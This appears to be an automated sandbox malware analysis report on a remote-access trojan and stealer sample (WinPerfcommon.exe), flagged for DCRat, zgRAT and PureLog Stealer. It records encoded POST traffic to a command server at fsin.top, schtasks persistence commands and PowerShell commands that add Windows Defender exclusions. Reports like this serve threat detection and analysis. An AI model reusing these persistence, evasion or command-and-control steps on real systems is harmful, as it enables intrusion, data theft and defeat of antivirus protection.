                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    14192.168.2.46245237.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:27.837985039 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:28.196190119 CET344OUTData Raw: 00 01 01 07 06 01 04 05 05 06 02 01 02 0c 01 06 00 02 05 0b 02 03 03 01 02 06 0e 02 04 52 00 00 0d 04 05 0e 01 07 04 50 0e 01 04 05 05 54 02 05 06 01 0e 0e 0a 07 05 01 07 04 06 50 05 05 04 0b 02 05 0e 0c 05 0f 04 52 0f 57 0c 02 0d 56 0e 09 07 07
                                                                                    Data Ascii: RPTPRWVW\L~hcjc[mOwvoQkRqB`R_~spIyoo{syY|C`tY{[}u~V@{mrL~L[
                                                                                    Jan 11, 2025 16:22:28.494632959 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:28.629147053 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    15192.168.2.46245337.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:30.266645908 CET309OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:30.618149042 CET344OUTData Raw: 05 00 01 06 03 0b 04 00 05 06 02 01 02 04 01 0b 00 07 05 0f 02 07 03 0c 00 02 0d 07 04 50 01 57 0a 01 03 0d 02 56 06 07 0e 06 04 06 05 56 04 04 06 53 0b 0b 0a 03 04 0a 04 02 07 54 06 05 05 0f 01 02 0f 5d 00 02 05 06 0e 0e 0c 0f 0d 03 0c 02 07 03
                                                                                    Data Ascii: PWVVST]]WWVW\L~hjwqn]wewP|aB`c_~p|K{olXopPmlCwg{\ie~V@@z}f}La
                                                                                    Jan 11, 2025 16:22:30.921850920 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:31.033463955 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:10:19:57
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                                    Imagebase:0x300000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:10:20:00
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
                                                                                    Imagebase:0x7ff6e97b0000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:10:20:00
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
                                                                                    Imagebase:0x7ff793e80000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Imagebase:0xda0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 63%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:27
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:28
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:29
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:30
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:31
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:32
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:33
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:34
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Imagebase:0x1d0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:35
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:36
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\SgrmBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\SgrmBroker.exe
                                                                                    Imagebase:0xdf0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
